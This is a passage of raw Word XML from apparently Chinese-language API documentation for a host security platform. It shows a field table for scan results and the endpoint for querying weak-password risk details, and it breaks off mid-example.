        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "11111111111111111111111111111111",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                "hello world"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "QT052016001395",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>whiteRuleEffect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F926B0"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694"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="372774B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24E1711" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="08D79496" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="516BF4D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="359BDAD9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F269801" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FB5B864" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796FD6B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="528C9354" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>24)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75FCD28E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>这条扫描结果的唯一标识</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5222F530" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06A25979" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1D4F3B38" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="039F9908" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CBE788A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>agent uuid,16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B8245F1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22250EFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02BC4CD0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CDB7FB0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BBE384A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="76CE5F9B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FC1FBA7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>connectinIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FE00BFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2138A5FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="15444316" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="202E04B0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6636BB7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CC37FC1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5308E4AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1739D1B0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4113F4C0" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20768CCF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F04B5DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72C1E93A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="141D3F59" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3CBFE8CD" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35A1452A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="06E726D1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6CC8C922" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>bigint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6DD919CE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="15C9DDAB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2952C8C8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="67ED5EFF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18623B46" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B88AFB8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="21FFF063" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C49A8F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30E3B5EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AC6B60A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="244263EB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="275E84A4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B5BA69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40BD540B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A4DF440" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BA01550" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="580F71D8" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7013549A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30A18DA9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="40C44DA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>512)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45E407E3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5383858D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="638F5843" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>vulId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D39F8A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>string</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0404F13E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>14)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CA79171" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>风险id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35A4FC50" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77A74278" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="66ADE409" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38122395" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2AEBDDB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="15704C34" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="203" w:name="_Toc115166176"/>
      <w:bookmarkStart w:id="204" w:name="查询风险详情-2"/>
      <w:bookmarkEnd w:id="202"/>
      <w:r>
        <w:t>查询风险详情</w:t>
      </w:r>
      <w:bookmarkEnd w:id="203"/>
    </w:p>
    <w:p w14:paraId="102810C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C186A5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}/{id}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB5B4AC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E1158E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:t>无</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04D827" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE53BD7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>weakpwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5b1edbed7d761b59ad1e7787</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573581B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABD544B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>vulId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
